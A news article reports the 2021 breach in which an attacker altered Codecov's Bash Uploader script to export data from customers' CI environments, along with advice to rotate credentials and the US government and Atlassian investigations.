Codecov, a company offering software auditing services, has fallen victim to a hack. The attacker appears to have been able to modify the company’s software. The American government has launched an investigation.
In an announcement about the hack, Codecov says that on April 1, 2021, the company found out that someone had had unauthorised access to the company’s Bash Uploader script and had made modifications to it. The attacker exploited a flaw in Codecov’s process for creating Docker images and was able to gain access rights to modify the Bash Uploader script.
Research shows that the attacker had been making occasional unauthorised modifications to the Bash Uploader script since 31 January 2021. This allowed the attacker to “potentially export information” stored in the continuous integration (CI) environments of Codecov’s 29,000 users. That information was exported to a remote server outside Codecov’s infrastructure. The Bash Uploader was also used in other Codecov uploaders, such as those for GitHub, CircleCI and Bitrise. These uploaders were also affected by the attack.
As a result, the attacker may have had access to all code processed by the uploaders, including access codes. Other services that were accessible with these codes are therefore also vulnerable. Information about the git repositories that the Bash Uploader was connected to may also have been leaked.
Advice to users
Codecov users are advised to change all access codes used by their software and replace Codecov bash files with the latest versions, where the malicious code is removed. Codecov itself has, of course, also taken the necessary steps to ensure that the consequences of the hack are reversed as far as possible and that a similar incident cannot happen again in the future.
Possibly similar to SolarWinds attack
The hack may have similar consequences to the hack on SolarWinds. There, attackers managed to add a backdoor to SolarWinds’ software, which gave them access to all computers where the software was installed. Codecov’s hackers managed to gain similar access rights and were able to make unnoticed changes for months.
The American government has now also become involved in the case, as Reuters is able to confirm. However, details of the investigation are not known. Atlassian also says that it has started an investigation into the situation but states that it has not yet found any signs of attacks. Reuters also contacted P&G, GoDaddy and The Post but received no immediate response.